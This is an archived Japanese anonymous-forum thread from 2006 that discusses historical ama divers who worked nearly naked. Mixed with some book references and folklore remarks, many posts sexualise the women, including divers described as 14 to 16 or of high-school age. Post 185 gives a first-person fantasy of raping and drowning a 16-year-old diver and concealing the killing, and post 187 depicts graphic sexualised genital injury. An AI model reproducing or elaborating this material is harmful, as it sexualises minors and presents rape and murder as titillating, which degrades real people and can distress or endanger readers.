自分はまだ小学生の時で、最初、見た瞬間男だと思い込んだけれど、説明文を読んで女だとわかり思わずムラムラしてしまいました。
操船する男たちも、近所の奥さんたちがほぼ全裸で働く姿を見ても、毎日のことだと何も感じなかったんでしょうね。

111 :天之御名無主:2006/07/08(土) 13:21:54
昔の漁村って、子供は全員、全裸で生活してて、毛が生えてくると、そろそろ
ふんどしさせなきゃあねって事だったらしいから、めんどくさいから、大人になっても
全裸って村も有ったと思う

112 :天之御名無主:2006/07/08(土) 14:47:35
>>111
110です。
小さい頃からの慣れでしょうね。
思春期以降に初めて、「ふんどしビキニ調査隊」と言うサイトにあるような写真の光景を生で見たら、間違いなく勃起もんですよね。

113 :天之御名無主:2006/07/10(月) 23:14:27
舳倉島の海士の写真て、すごく衝撃的でしたね。
モノクロだけど、海女さんがTバックより細いフンドシだけの姿で船から海へ飛び込むところを後ろからアップで。
下世話な話だけど、初めてのマスターベーションのオカズにしました。
風俗以外で、しかも屋外で全裸同然で働く女性に異常に興奮してしまったのかな。

114 :天之御名無主:2006/07/11(火) 16:59:11
浜芸者とか言って、海女さんが、夜はふんどし一丁の丸裸で、お座敷に出て
太鼓を叩いたり、踊りを踊ったりする温泉もあったそうだ

115 :留吉:2006/07/11(火) 19:20:22
昔(戦前)は今よりシンプルな思考だったから男は体が大きく力が強い男(むさくてもよかった)
がもてたみたい、村の相撲大会などで横綱・大関クラスのがたいのいい男は女にこまらなかったそうです。
春から夏は汗かくこともでしょうけど山や船の裏などでいたって簡単に性交おこなって
終わればフンドシで拭いて知らん振りできたそうですよ。ふだん裸にならない農村は相撲
の強さや体を村の女たちが見てどの男が強いかはんだんして楽しんだそうです。


116 :天之御名無主:2006/07/11(火) 22:05:53
舳倉島ってよそ者の来ない所だったから、ああだったのかな。
島の男にしても、自分の船から目の前で「一糸まとっただけの?」姿で海へ飛び込むのは自分の奥さんか娘だし。
これが、今週は隣の奥さんと、来週は向かいの家の娘さんとなんて交代でペアを組んだらかなりヤバいか。
風景とか鳥なんかを写しに、海士のことを知らずに島へ来た写真家なんかは、下半身が緊張しっぱなしだったかも。
写真が雑誌とかで紹介されて、観光客が来るようになって(多分男のグループ・団体ばっかりかな)急速にパンツをはいたり、ウェットスーツが普及したみたいですね。
時期としては昭和30年代の終わりごろらしいです。



117 :留吉:2006/07/16(日) 12:49:34
戦前に漁村の亭主が戦争に召集されたとき、かみさん(アマさん?)にせがまれて
ずっと取り替えないでつけてた汚れた褌をはずして置いていったそうです。
意外と漁村は貞節もったおかみさんがいてだんなが戦地に行っているときその
褌を亭主がわりにしてがまんしていたそうです。(褌つけたままおかみさんが手で手淫
してわざと汚させたものだっつたそうです)


118 :天之御名無主:2006/07/18(火) 06:13:56
>>116
>>時期としては昭和30年代の終わりごろらしいです。
『三丁目の夕日』で取り上げられないかなあ、海女のエピソード。

119 :天之御名無主:2006/07/18(火) 19:35:15
>>112
「ふんどしビキニ調査団」の日本のふんどしコーナーに出てる海女のふんどし解説は必見!

写真付で詳しく解説してる!ガイシュツかとは思うが・・・。

120 :天之御名無主:2006/07/18(火) 19:38:53
>>119
失礼しました。
ふんどしビキニ調査「隊」でした。

121 :天之御名無主:2006/07/18(火) 21:05:31
>>118>>119>>120
110.116です。
やはり自分が小学生の時、市立図書館の児童館で見た写真(B5の見開き両面だったと思います)ですけど、大勢の海士さんが岩場に立っていて、そのうちの若い人ばかり3〜4人がお尻はこちらに向けたまま、怒ったような顔や苦笑いの表情で振り向いているものです。
例によって、あのようなフンドシですから、上体をよじってお尻に力が入っているのか、Tの字の縦の部分が殆ど隠れてしまって、腰に縄を1本巻いているだけみたいな感じでした。そのうちの1人は30年以上経った今でも顔もハッキリ覚えています。
最近、もう一度この写真を見たくなって神田の古本屋さんを探したりしたんですけど、子供向けの本だったとは思うものの、地理の本だったのか、水産業関係の本だったのかも判らず、見つかりませんね。
カミさんに知れたら変態扱いされそうだナ。



122 :天之御名無主:2006/07/19(水) 01:10:08
>>121
"一億人の昭和史"の1巻に載ってる写真が近いと思う。
中学の図書室に置いてあったこの本で、私は舳倉島のサイジ海女を知った。
大きめの古本屋をあたってみて。

123 :天之御名無主:2006/07/19(水) 21:25:28
>>122
どうもありがとう。探してみます。

124 :天之御名無主:2006/07/20(木) 21:45:33
>>119
「ふんどし」でググってみたらすぐにわかりました。
すごいね、このサイトは!今夜のおかずにさせてもらいます。

海女というのは、てっきり、白い上下を着ているだけで、
「海女のふんどし」なんてエロ映画に出てくる作り物、虚構の世界だと
思っていました。

当時は本当にこんな格好していたのなら、俺のチン子はカチカチ・・・。

125 :天之御名無主:2006/07/22(土) 06:29:17
>>124
エロ映画の海女さんより露出度が高いし。
地元のまちスレに書き込みをしたらヒンシュクを買いました。

126 :天之御名無主:2006/07/23(日) 15:12:28
舳倉島や、対馬曲の海女の、縄ふんどしについて、昔の観光案内なんかに、てのひら
大の三角巾を細縄で吊って、わずかに陰部を隠すのみの丸裸でって書いてあって、有名な
イタリア人の写真集なんかでは、けつは完全に出てても、前はかなり大きいので、露出度
を大げさに書いたのかなって思ってたら、今度でた「人魚たちのいた時代」って
本に、ほんとうに五センチくらいの赤い、縄ふんどし一丁の裸海女が出てて、本当は
このサイズだったんだ、よくこれで恥ずかしくなかったなって思いました

127 :天之御名無主:2006/07/24(月) 23:55:28
>>126
「人魚たちのいた時代」に書いてあった、記録映画「日本の海女」
は、DVDにならないのかな?

最近、宝島から発売の鉄道もののDVDムックに、岩波から発売され
てた作品が収録されてるそうなので、楽しみにしてるのだけど。


128 :天之御名無主:2006/07/25(火) 00:22:19
>>126
「人魚たちのいた時代」でも見ましたけど、てのひら大の三角巾も陰部までで、肛門のあたりは細い紐をよじって食い込んでいる感じだけど、こすれて痛くなかったのかななんて想像してしまいました。
それに、Tの字の縦の部分があの細さだから、もう少し画像が鮮明だとお尻のヘアーがはみ出して写っているんでしょうね。
>>127
ヤラセで無いだけに、却ってそそられますね。下手なAVより売れるかも。

129 :天之御名無主:2006/07/25(火) 23:11:39
「人魚たちのいた時代」買った。
「カチド」用の縄ふんどしって、マライニとかの本に載ってたやつ(フナド用)より
さらにチャチいんだな。
尻穴が隠せないじゃないか。

収穫だったのはスレタイにもある「全裸」の海女の記述に一般文献としては
初めてお目にかかったことかな。
このスレだけの妄想じゃなかったんだw。

130 :天之御名無主:2006/07/26(水) 13:46:30
となりの国から、出稼ぎに来てた海奴とか、赤裸てのが、全裸海女らしい、今は
済州島が有名だけれど、昔は半島の多島海にも散在してたらしい、生にんにくを齧って
日本人が潜れない、厳冬期に活躍したそうだ

131 :天之御名無主:2006/07/26(水) 21:55:11
「人魚たちのいた時代」俺も買ったよ。レジの女性店員が表紙がやたら気になる様子だったw
俺の収穫は、済州島からの出稼ぎ海女が辛いものを食べてるから(?)全員パイパンだという話だ。



132 :天之御名無主:2006/07/28(金) 06:27:37
「人魚たちのいた時代」は店頭で買うのが照れくさいので、通販で買いました。
それにしても、子供の頃見た写真を、なんで40年近くも経った今になって、もう一度見たくなったのかと考えてしまいました。
AV女優でもなく、風俗でアルバイトをするような浮いた感じの子でもなく、
勤勉で、観光客が来るようになったら恥ずかしがってウェットスーツを着るようになってしまうような、
どちらかと言えば、大人し目の(オジサン的な発想では優等生っぽい)子が、ヒモのようなフンドシひとつで(全裸よりエッチな感じで好きですけど)、しかも屋外で一生懸命働いている姿に惹かれてしまったのかななどと・・・。


133 :天之御名無主:2006/07/28(金) 11:50:35
関東弁では、いつ頃から女陰のことを「まんこ」とか「おまんこ」など
と呼ぶようになったのでありましょうか?
(徳川家康や家光、家斉の側室に「おまんの方」という人物が居ますが、
わけても家光の側室「おまんの方」は本名が六条万子といったかと記憶
して居ます)。


134 :天之御名無主:2006/07/30(日) 19:45:24
>>133
全国共通の隠語だと思っていました。
子供の頃から時々耳にしていたけど、関東弁だったんですかぁ。

135 :天之御名無主:2006/07/30(日) 23:43:30
>>132
>>ヒモのようなフンドシひとつで
なにやら首輪のない犬や猫をみると、飼い犬、飼い猫でないというのを連想。

万が一災難にあったとき、全裸死体では事件と間違われるけど、ヒモでも付いて
いると職業が分かって、判断材料にはなる。兵士の認識票の類いか。

司馬遼の「菜の花の沖」に漁師が一物にワラシベ一本結び付けてという記述が
あった。

儒教では無冠は恥じという考えがあって、頭の髷を茶巾風に布でつつむという
習慣もある。全裸は恥じということに繋がっているかも。

お楽しみところ、無粋な話になった。

136 :天之御名無主:2006/08/01(火) 20:36:23
>>135
なるほど。

137 :天之御名無主:2006/08/03(木) 22:16:24
「人魚たちのいた時代」75p

『・・・最初に文献に現れてくる海女は、(中略)・・・ところが弱ったことに、
衣装については書いておいてくれなかったので、何を着ていたのかさっぱり分
からない。そこで、何も着ていなかったのだろうと考えるのは早計であろうか。
しかし、おもしろいもので、そう考えている学者は意外と多いのである。つい
最近まで、生まれたままの姿で潜っていた海女部落があったと、絶対に信じて
いる郷土研究家の方がいて、そういうことに興味を感じる筆者は、わざわざ地
方へ取材に行った経験がある。そのことはむしろフィクションとして別の機会
に申し上げたいと思う。・・・』

是非!!!

138 :135:2006/08/05(土) 00:42:16
>>137
無粋な話しか出来ないのにまた出てきました。

その本は見たことはありませんが、一時期海外の古いポルノにこってまして、
行為の話はいろいろあるとして、よく分からないのが、当時の生活習慣です。
書かれた時代にみんなが常識のことは、書いてないんですね。

例えば、ベルサイユ宮殿にはトイレがなかったというのがありますが、一般
家庭ではどうだったか。女性はいつからパンティを履き始めたか。大小はどの
ようにしていたが。どう処分したか。ペストの流行、下水道整備など別の観点
から埋めるということになるんですね。今は大分分かっているみたいですが。

139 :天之御名無主:2006/08/06(日) 14:56:27
またまた舳倉島ですけど、夏の間だけ島に開設される分校、駐在所、診療所などで勤務する人って、やはりある程度年配の妻帯者だったんでしょうね。
若い男の先生、警官、医者などだと家族以外の女性の裸を直に見るのは初めてなんてこともあるだろうし、しかも日中、屋外でなんて結構ヤバいななんてね。
こんなことを研究して発表した人なんて居ないだろうし、語り継がれることも無いんでしょうね。

140 :天之御名無主:2006/08/07(月) 08:17:16
>>139
いつ頃のことか知らないけれど、戦後間もなくまでのことなら、まだ遊郭があった
からその手の欲求はそっちで済ませるから、やたら興奮するということは少なかっ
たと思われる。

141 :天之御名無主:2006/08/12(土) 16:13:04
>>140
139です。なるほどです。
ところで逆に、一日中船の上で奥さんの裸を見ていた人は、見飽きて肝心なときに?興奮しなくて困ったなんてこと、無かったんですかね。
下ネタになってしまうせいか、当時の男性(海女の夫、島で勤務する人、島へ観光や研究などで来た人などを含めて)の感じ方って、最大の謎のような気がします。


142 :天之御名無主:2006/08/12(土) 21:34:29
つうか海水浴場でビキニ姿の若いコを
みてすぐに興奮するか?じゃまいか?

143 :140:2006/08/12(土) 23:37:24
>>141 これは分からない。>>142 が意外に真実かも。
テレビなどでスタイルのいい子は見るけど、普通は全裸ではそんなにいい子はいない
んじゃあるまいか。胸も正面向いているとイイと思うが、大抵は「ハ」の字だよね。
その方が授乳には向いている。それを下着で寄せて上げているんでしょう。

ヨメさんも(この時期なら)浴衣でも着て座った姿のお尻の丸みなんかがイヤになま
めかしいなんていうことになるかも。手鏡でスカートの中をみて捕まった、結婚歴3
回目の先生がいたが、衣装小道具の魅力は侮れない。

また、女性は表情一つで、天女にも夜叉にもなる。

144 :天之御名無主:2006/08/16(水) 15:30:46
>>139,>>141
>当時の男性・・・の感じ方って、最大の謎・・・・
とは、大仰な物言いだな。夏場の漁村に足を運んだこともなく、
第2次3次産業従事者の仕事着しか目にする機会を持たない文明
生活にどっぷり浸かった妄想厨房の発想だな。
毎日通うプールで目に入るビキニ姿に、毎日興奮し続けるかどうか
想像してみろよ。裸慣れしてるわけですな。海に生きる人たちは>>105

145 :天之御名無主:2006/08/16(水) 18:09:09
>>144
達人ですなあ。
そういえば、ブタや山羊や牛や馬のメスの尻を見てもなんとも思わないよな。
みんな似たようなモン。学校で山羊のお産をさせたときは感動したけど。

146 :天之御名無主:2006/08/18(金) 11:03:26
ヒマなムダ話だが、

山本周五郎の(文庫本の)「日々平安」の中の「ほたる放生」を読んでいたら、
深川ー洲崎あたりの岡場所の描写で、銭湯に行く銭のない女が近所の幅六尺の
小川で全裸で体を洗う場面が出てくる。側の道を通る男どもが冷やかすと逆に
挑発的な姿態を見せるという。

あの辺は埋め立てだから、小川は石垣で護岸がしてあると想像されるが、底が
砂利なら蜆でも採れそうな雰囲気。その岡場所の女も地方から借金のかたに出
て来たんだろう。地方での生活がしのばれる。

この挿話はなくても話の筋は通るが、山本周五郎も読者サービスで入れたのか
出身地の初狩で見た光景を思い出したものか、庶民のタクマシさの点景になっ
ている。

147 :天之御名無主:2006/08/23(水) 21:46:13
>>146
ヒマなムダ話、結構じゃないですか。
すごく冷静に分析していますよね。
自分なんか、当時の裸の海女さんをあれこれ想像してばかりだから、「へぇー」って感心して読ませてもらっていますよ。

148 :146:2006/08/24(木) 11:39:43
>>147 どうも。
児玉清だったと思うけど以前テレビで文庫本をもって書いてある場所を訪ねていた
ことがあった。以来自分も出かけると読んで憶えている場所の近くに行ったときは
寄って見ることにしている。遊郭とか岡場所とか、今ないから地形とか町筋とかだ
けになるが、なるほどと思ったり、ナンダヨと思ったり楽しんでいる。

根津神社へ行った時は境内の休憩所で土地の年寄りを捉まえることができて30分
も話し込んだ。年寄りも楽しんでいる風情があって面白かった。帰りに今は病院の
看護師寮が立っている路地などへ入ってあれこれ眺めたりした(看護師に興味があ
ってのことではない。念のため。) 同行していたヨメの顰蹙をかったけどね。

玉の井は車では通ったが、路地に入れなかった。今、東京では懸案。なかなか行く
機会がない。行けたらまた永井荷風を読みたい。

深川江戸資料館とかあるけど、オトナの話は聞けないんだよね。

149 :天之御名無主:2006/08/25(金) 01:41:10
昔、古い形態の海女のドキュメンタリーを見たことがある。(場所は舳倉島だと
思う)ふんどし一丁で海に潜る者はもう老婆と言っていい年齢で、痩せこけて皺
だらけの身体は痛々しさを感じた。しかし、番組も終わろうかというころに、
女子高生海女の集団が登場してきたんだな、これが

150 :天之御名無主:2006/08/25(金) 08:15:33
>>149
時代が進むほど、若い海女さんが恥ずかしがってテレビや写真を撮らせてくれなくなったみたいですね。
122さんが紹介している写真なんかだと、まだ昭和初期で無邪気な感じで写っているけど。
顔立ちや、胸やお尻の張り具合から今だと女子高生ぐらいでしょう。

151 :天之御名無主:2006/08/25(金) 17:21:00
千葉県御宿の海女さんは観光化してて、昭和三十年代には木綿の短パンツ
一丁のおっぱい丸出しで撮影会をやってます、素人が観光協会に頼むと、
モデル代は一時間五百円と観光ガイドブックに有ります、場所は別ですが
ふんどしを外して踊って、おねんね付きの浜芸者をしている海女部落も
ありました

152 :天之御名無主:2006/08/25(金) 21:29:04
すげえ…
勃起勃起

153 :天之御名無主:2006/08/27(日) 07:06:56
>>151
同じ千葉県でも白浜の海女さんは露出が少なかったですよね。
浜芸者をしていたのは舳倉島の海女さんでしょうか。シーズン以外は輪島市内居住ですから、和倉か加賀温泉郷あたりでアルバイトしていたのかな。

154 :天之御名無主:2006/08/27(日) 11:18:16
舳倉島の海女さんは排他的でプライドが高かったって聞いたことがある。
東尋坊の海女さんじゃないかな。他にもいたかも知れんしはっきりとは
知らんけど。

155 :天之御名無主:2006/08/27(日) 19:03:47
次期首相と目されているヒトの田舎近くにもアマさんがいるけど、10日に1回のもぐりで
1回もぐると、10マンの水揚げがあるって、この前テレビで言っていた。

資源保護もあるんかも知れないが、ワリのいい仕事と見える。手で取るとサザエなど
傷が付かないので、商品価値が高いんかな。

156 :天之御名無主:2006/08/27(日) 20:33:17
>>154
東尋坊の海女さんですね。今日入手した本(昭和6年刊行)に芸者代わりに云々と出ていました。人数は20〜30人とのこと。
写真もあって、岩場で2人の若い(顔はあっちを向けているけど、胸やお尻の形は良いので多分)海女さんが頭に手ぬぐいを巻いただけの全裸で写っています。
ただ、手に衣類と思われるものを丸めて持っています。解説からは、海に潜るときに全裸なのか、休憩など陸に居るときに全裸なのかは定かでありません。


157 :154:2006/08/27(日) 23:52:17
>>156
それはすごい。
なんて本か教えてもらえませんか。

ちなみに場所は違うけど、御宿の海女さんは海から上がるとすぐに
磯パンツを脱いですっぽんぽんになるって「海女の群像」に書いてあ
りました。
一方で何年か前に立ってたスレで輪島近くに舳倉島とは別の海女
部落があって全裸で潜ってたという書き込みがありました。
これのことかな?
さて、真偽はどっち?

158 :天之御名無主:2006/08/28(月) 00:15:10
>>157
日本地理大系第6巻中部編下巻(改造社刊)です。

159 :天之御名無主:2006/08/28(月) 12:18:01
>>158
どうもです。見たいなあ。
今度図書館で検索してみよ。

160 :天之御名無主:2006/08/28(月) 14:13:25
ここは真性の薫りが仄かに漂う部屋ですか?

161 :天之御名無主:2006/08/28(月) 21:37:23
>>122
121.150です。
ありました。自分が見たものとは違っていましたが、これもいい写真だと思います。
昭和初期だと、一般的に被写体となる人が強張った表情で写ったものが多いですが、若い海女さんが自然な笑顔で写っていますね。
>>159
もし購入するのでしたら、ヤフオク、楽天フリマなどで検索してみては。
宅配が不都合でも、店頭販売併用の古書店もありますよ。

162 :天之御名無主:2006/08/29(火) 20:45:38
>>159
もう1冊、お勧め。
158と名前が似ていて、「図説日本文化地理大系第11巻中部V(小学館S36刊)」です。
舳倉島の海女さんが、浜で繋留された船の上でやや前屈みになっているのですが、頭に手ぬぐいのようなものをかぶり、半袖のシャツを着ているのですが、下半身は「サイジ」がわずかに認められるだけです。
斜め後ろから写したものですが、傍に居る女の子のお母さんだとすると、20代半ばから30歳ぐらいと思われます。
画質が良く、唯一、カラーでないのが残念なくらい綺麗なヒップラインです。
20年程前に図書館で見て、最近、「楽天フリマ」で入手しました。


163 :天之御名無主:2006/08/30(水) 00:10:57
ふんどし海女一代記

164 :天之御名無主:2006/08/30(水) 22:12:08
>>162
よく覚えてましたね。

165 :天之御名無主:2006/08/30(水) 22:41:49
>>164
「日本」と「地理大系」と言うタイトル、表紙の色を覚えていたので「ヤフオク」で検索し、見本の写真で確認できました。
それにしても、ごく普通の女性(自分の娘とか母親、隣の奥さんとか向かいの娘さんとか)が屋外で裸で働く姿って、思いもよらないことでしたから、「興奮した」とか「感動した」とか言うより、「ショックだった」と言ったほうが正確かもしれませんね。

166 :島んにょ:2006/08/31(木) 02:28:52
てゆーかさ、ものごころつくまえにもう家族も周りもみーんな当たり前にふつーに裸になってたわいもない話で盛り上がって仕事して日常が過ぎてゆく…
そんな環境で生活しとんのよ。
いちいちひとの裸に刺激なんかされとって浜の仕事なんかやっとれるかいや w

167 :天之御名無主:2006/08/31(木) 12:07:39
そうだよね。風呂入ってメシ食ってテレビでも見るかって生活じゃないもんね。
電灯点けて本なんぞ読んでいたら、電気代が勿体ないと怒られるよ。
(ランプなら油代ね)

168 :天之御名無主:2006/08/31(木) 12:08:22
>>166
正解。

169 :天之御名無主:2006/08/31(木) 20:34:32
>>166
大抵の漁村はそうだったでしょうね。
自分が生まれ育ったのは舳倉島のある石川県とは丁度裏側の千葉県なんだけど、子供の頃は漁師がふんどし一つで道を歩いていたり、浜へ出れば、男の子たちがスッポンポンで遊んでいるなんて珍しくも無かったですね。
ただ、舳倉島は少し違うと思うんですよ。
舳倉島の写真を沢山見ると気付かれるかも知れないけど、どれも子供も含めて男の人は、決まって上下とも服を着ていて、結構長袖姿も目立つんですよね。
気候のせいなんかだろうけど、舳倉島に限って言えば、みんなで普通に裸で過ごすような土地柄では無くて、仕事中の女性だけが裸だったと思うんです。
自分はヌーディストビーチや何かで、みんなが裸でいる写真とか映像を見ても殆ど何も感じないけど、舳倉島の海女さんにだけはハァハァしてしまうんです。
この、男は普通に服を着ていて、女は裸というコントラストのせいもあるかなって気がするんですよね。


170 :天之御名無主:2006/08/31(木) 22:06:35
>>169
いろんな意味で、舳倉島は特殊な環境かもしれんね。
絶海の離島で外部の目が少ないし、舳倉の海女さんは昔から海における「侍」として扱われていて完全に女上位社会だったらしいしね。海女漁が主要産業なんだから男は女に頭が上がらない。
そんな海女さんの「正装」である褌一丁の裸体は、見ても何も感じないどころかむしろ尊敬すべき、誇るべき存在だったのかもしれない。
いかがわしい目で見ることなどもってのほか、という意識付けが男達にもあったのかもね。

ハァハァする気持ちはよくわかる。
いわゆるCMNFというやつだから外部の人が見て興奮するのは仕方ないと思う。


171 :天之御名無主:2006/08/31(木) 23:16:02
>>170
この島では、姉さん女房や、妻が世帯主と言う率がかなり高かったそうですね。
ところで思春期の男の子なんか、いくら小さい頃から女の人の裸を見慣れていても、必ずいつか目覚めてしまう時は来るわけだし、どんな形で目覚めて行ったのかななんて考えてしまいますね。

172 :天之御名無主:2006/09/01(金) 21:18:56
>>171
反対に、将来海女になる女の子がどういう性意識を持って成長していったのかっていう
のも気になるなあ。
昔の漁村の子供は文字通りフルチンやすっぽんぽんで遊びまわっていたわけだから、や
がて成長するに従ってそんな格好が恥ずかしくなってくるはずだ。特に女の子のほうが
思春期は早いんだから。
しかも海女になる女の子は思春期真っ只中の14、5歳で海女修行を始めるんだから、同年
代の見習い漁師もいるかもしれない中で褌一丁の裸というのはそりゃ恥ずかしいんじゃ
ないだろうか。いくら幼馴染でお互いの裸見慣れてるといっても幼児の頃のハナシだし。
男の子の性の目覚めも気になるが、新米海女の娘がいかにして羞恥心を消して一人前の
海女になってゆくのかっていう過程にも興味ある。

173 :天之御名無主:2006/09/01(金) 22:10:48
>>172
そうですよね。
だけど、家族間では平気だったのでは。
当時の写真なんかを見ると、夏の間、島で寝泊りする小屋と言うか家の様子、船に乗るときにはすでに褌一丁の裸であることとか考えると、思春期から嫁入りまでの娘さんが、家で父親の前で全裸になる訳だから幼い頃からの継続的なことなのでは。
中断期間があったとしたら、14、5歳の女の子が急に裸になったらお父さんが多分うろたえてしまうでしょう。
観光客が来るようになって急速に廃れたことを考えると、知らない人に裸を見られて初めて羞恥心が芽生えたのでしょう。
110の本に、「海士(女)たちは、カメラを向けられることを極度に嫌う。」と書かれています。
そう言われてみると、この頃の若い海女さんの写真、特に陸上で写したものは、昭和初期のものと違って隠し撮りに近いものが殆どですね。121の写真なんかで見ると体型が昭和初期に比べて格段に良くなっていて残念ですが。

174 :天之御名無主:2006/09/01(金) 23:31:59
男の子にしても幼い頃から継続的に女の人の裸を見ているから平気だったのでしょうね。
もし、我々と同じように中断期間があって、他所の家の娘さんや奥さんが褌一丁で働く姿や、場合によっては、母親や姉が仕事に出るためパンツを脱ぐところを見たりしたら、170さんが言われるような意識付けはどこかへ吹っ飛んでしまうような気がします。
シーズン以外は輪島市内で生活して他の地区の人との交流もそれなりにある訳だし、特に、戦後も30年代になるとメディアを通じて意識の変化とか多様化で「縛り」が必ずしも効かなくなっていたと思うんです。
島の男の子の性の目覚めは、我々に比べたらかなり緩やかなものだったような気がしますね。
連貼りスミマセン。

175 :処刑ライダー ◆.EDMOUBKE2 :2006/09/01(金) 23:52:47
文明の発展=隠し所の多い社会

こんな感じじゃねえの?

176 :天之御名無主:2006/09/01(金) 23:54:43
>>173、174
なるほど。
つまり、海女部落の女の子は、「他人(あくまで同じ集落の人々)の前で裸を見せる」だけのことについては、一貫して羞恥心はなかったと。
ならやはり男の子も同じ集落の女の人がただ「裸で働いている」だけでは興奮したりしなかったという解釈も成り立つね。

まずい、話題ループ気味やね。


舳倉島や御宿の裸海女は昭和30年代後半まで残ったけど、そもそも明治後期ぐらいから漁師や炭鉱夫が全裸で働いているのを「けしからん」として問題にする偉い人は沢山いたみたいだ。
「これから世界の一等国になろうとするわが国にそんな土人のような風習が残っているのはけしからん」ってことだろうか。
ちょうど富国強兵に邁進してた時代だったしね。
S30年代に絶滅するまで、裸の海女には常に行政指導が入っていたのかもしれない。
勿論交通の便が発達して観光客が来たり、外部の情報が入るようになってなり手がなくなったというのが絶滅の第一の原因だとは思うが・・・。

177 :天之御名無主:2006/09/02(土) 01:18:05
変な話だが、女の裸なんて昔は世界中に溢れていたと思うよ。
乳房なんて一生露出したまま生活するなんて民族はいくらでもいた。
未開民族だけじゃなくてバリ島なんかも女は上半身裸だった。だからって女の身分はそんなに低いわけでもない。
まあ、女が全員全裸の状態なんて慣れたら何でも無くなるわな。
逆に男の全裸のほうが困る。亀頭なんて粘膜だし、ぶらぶらして労働にならない。だからペニスケースなんぞが要る。

男がチンポを隠したとしても、女は対応する隠すべき箇所が皆無。せいぜい生理対策の腰紐が必要な程度だろう。


178 :天之御名無主:2006/09/02(土) 06:38:58
全裸だと魚介類が膣に突入したりするから危険

179 :天之御名無主:2006/09/02(土) 08:50:57
>>178
実際にそんなところだったのでしょう。
命綱をつないだり、「ヘラ」をくくるためだけだったら腰に縄を1本巻いただけの姿だったでしょうね。
あれだけの露出度なら、性器やヘアーを隠す目的は無かったと思います。
男の全裸だと、魚介類に噛み付かれそうでもっと危険ですね。

180 :159:2006/09/02(土) 14:21:30
話題に上がっていた「日本地理大系第6巻中部編下巻」を取り寄せてみた。
(割とあっさり見つかった)
確かに東尋坊の海女が全裸で波打ち際にいる姿が載っていた。
でもこれはあれかな。御宿と同じパターンで、海から上がって休む時に
濡れたものをみんな脱いで全裸になってる姿だろうね。
本の後半のほうには東尋坊の海女たちが白い磯着姿で並んでる写真もあ
るから潜る時はちゃんと磯着着用だったと思われ。

あるいは海芸者として客が投げ込んだ銀貨や銅貨を海から拾う遊びの時
もこの格好だったのか? 可能性はあるね。

同じ中部地方なのに舳倉島の海女の写真は全然出てないね。(記述はあった)
その他にも色々興味深い資料でした。


181 :159:2006/09/02(土) 14:28:03
あ、上の間違い。
東尋坊の着衣海女が並んでる写真は「中部編上巻」に載ってたんだった。
上下巻セットだったもんで間違えた。

182 :天之御名無主:2006/09/02(土) 15:37:59
>>180
>>181
舳倉島の海女の写真、1枚だけ載っているけど、胸から上だけでしかも画質が悪くてウエットスーツでも着ているようにも見えますね。
舳倉島の海女さんが褌一丁で(162の写真を含めて2枚)写っているのは、これとよく似たタイトルの「図説日本文化地理大系第11巻中部V(小学館S36刊)」です。
こちらの方は、週刊誌のグラビアにでもした方が無難だったのではと思うようなものです。
千葉へ話が飛ぶけど、同じ千葉でも外房と内房では対照的でしたね。
御宿の海女さんとか九十九里浜で男に混じって地引網やっている外房では女の人がパンツ1枚でと言うのはあったけど、白浜(どちらかと言えば内房側)の海女さんは早くから白い磯着を着ていましたね。
それに、女は魚を仕分けたり、加工したりの仕事が主だったようで、「半農半漁」の家も多かったように記憶しています。内房に限っていえば、女の人が男の前で肌をさらす場面は無かったと思います。

183 :159:2006/09/02(土) 21:17:42
>>182
舳倉島の海女さん、確かに一枚だけあった。
肩口しか見えてないから気づかなかった(水中から船縁に掴まってる)。
まあ、舳倉島の海女は色んな資料に載ってるから、気長に集めようかな。

>同じ千葉でも外房と内房では対照的でしたね。・・・
そうなんだ。自分は千葉の房総海女に関しては「海女の群像」に載ってる
御宿の海女しか知らないからなあ。
色々語って教えてください。

184 :182:2006/09/03(日) 08:14:10
>>183
舳倉島の海女さんの資料、やっぱり、何度か触れたけど、島の男の人の視点に立ったものがいちばん集めにくいでしょうね。
どうしても、聴きづらい、語り難い内容に行ってしまうし。
案外あっさり「サイジ姿の女は神聖にして決して手を触れてはならぬみたいな決まりはみんな守っていたサ。
だけど15〜16の男が、学校の先輩だった女の子たちが裸で働いているの見て何も感じないはず無いだろ。
その中の1人が今のカミさんだよ。」みたいなものかも。

海に囲まれた千葉県で生まれ育った自分、実はカナヅチなんですよぉ〜。親類が漁師か元漁師ばっかりと言うだけ。
そんなせいか、泳ぎのうまい女性への憧れみたいなものが子供の頃からあって。
白浜の海女さんがスイスイ泳ぐの見て「感動した!」みたいなね。
そこへ持ってきて、舳倉島の海女さんが裸で海へ飛び込むの見たもんだから「興奮した!」のが今に至っているわけです。

185 :妄想です:2006/09/03(日) 20:11:54
潜ってる全裸海女(16歳、出身は賤しいが美人でスタイルよし)を待ち伏せ。
水中で捕らえて水中ファック。
自分は酸素ボンベ、スェットスーツ着用(股間に穴があり陰茎のみ外に)。
素潜りの海女が窒息する瞬間、膣がピクピク痙攣するのがたまらない。
ことが済んだ後は、膣にアワビやサザエを詰めておく。
水死した海女の死体が漂着するが強姦されたとは誰も思わない。
膣にアワビやサザエを詰めてあるのを見た部落民達は彼女を「海のハイヌウェレ」として祀る。

186 :天之御名無主:2006/09/08(金) 06:03:46
>>178.179
サイジっていう代物は「ふんどし」というよりただの「防具」
と考えたほうがいいんですかね。
膣と尿道、肛門を異物や小動物から守るための、当て布に
すぎないと。
要するに前張りじゃないですか。

最初は全裸で潜ってたが、砂が入って炎症を起こしたり魚介
類が侵入して怪我したりしたからサイジを着けるようになった
というプロセス?
妄想湧きますねえ。

187 :天之御名無主:2006/09/08(金) 16:18:41
磯のカツオが全裸海女(21歳)の膣の中に突入!「痛!」
カツオは子宮口まで頭を突っ込み、暴れた。
脚が痙攣して泳ぐこともままならず激しい痛みと性感で失神。
雇い主が溺死寸前で浮かび上がってきた全裸の女を回収した。

膣から魚を引き抜く。
ひれで膣壁が傷つけられ、鮮血が迸る。
鮮血の中には尿、糞便も混じっていた。直腸や膀胱壁まで貫通した
痛みで女は意識を回復した。

女は痛みと膣の汚れのため生涯男と交わることが出来なかったという。

188 :天之御名無主:2006/09/08(金) 19:42:38
楽しい?

189 :天之御名無主:2006/09/08(金) 19:55:26
画像うP希梵

190 :179:2006/09/08(金) 21:34:29
>>186
もし、激しい動きにも水の抵抗にも強くて剥がれ難く、剥がす時は痛くない前張りを作る技術があれば、そうしていたと思います。
あとは、命綱をつないだり、「ヘラ」をくくるために腰に縄かベルトを1本巻いた姿だったのでは。
それにしても、島の人たちはともかく、部外者には随分とエッチな姿に見えたでしょうね。

191 :天之御名無主:2006/09/11(月) 13:41:58
アリの巣コロリってあるじゃん。
蟻の行列にポンと置くと、一瞬ビックリして列が乱れる。
